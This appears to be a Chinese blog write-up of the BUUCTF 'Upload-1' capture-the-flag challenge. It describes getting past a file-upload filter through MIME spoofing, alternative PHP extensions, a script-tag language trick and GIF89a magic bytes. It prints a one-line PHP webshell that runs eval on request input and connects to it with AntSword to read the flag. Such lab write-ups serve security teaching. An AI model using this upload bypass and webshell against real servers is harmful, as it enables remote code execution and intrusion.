BUUCTF——[极客大挑战2019]Upload-1

相关过程:

接下来的思路就是先修改MIME类型和文件后缀,看看它在这方面有没有设置检测点

目前看来服务器存在MIME类型检测也存在文件后缀检测,接下来就是去试一试是文件后缀白名单还是文件后缀黑名单检测

其实根据以上内容可以判断出,目标服务器上采用的是文件后缀黑名单检测加上上传的文件内容中不可以存在<?

那么接下来就可以使用<script>标签中的language属性来绕过文件内容检测并对服务器中写入php代码。至于如何去执行php代码,可以试试一些可以被解析成php后缀的后缀名。例如php3、phtm、phtml等。

编写完poc以后,发现服务器端又提示了如上内容,说明可能存在文件内容检测中的文件幻数检测,接下来的思路就是构造文件幻数,这里采用gif图片的文件幻数:GIF89a

加入文件头幻数后,成功上传木马,但这里没有告诉我们上传文件存放的路径。此时一般是猜测存放在/upload、/uploads、当前目录的上一级目录下的upload或uploads中。

接下来就是通过蚁剑连接然后去根目录下拿到flag

相关知识点:

  1. language属性的作用是定义标签中所使用代码的语言类型
  2. 通过<script>中的language属性写入一句话木马的方式为:
    • <script language=’php’>eval($_REQUEST[“cmd”])</script>
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

&_@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值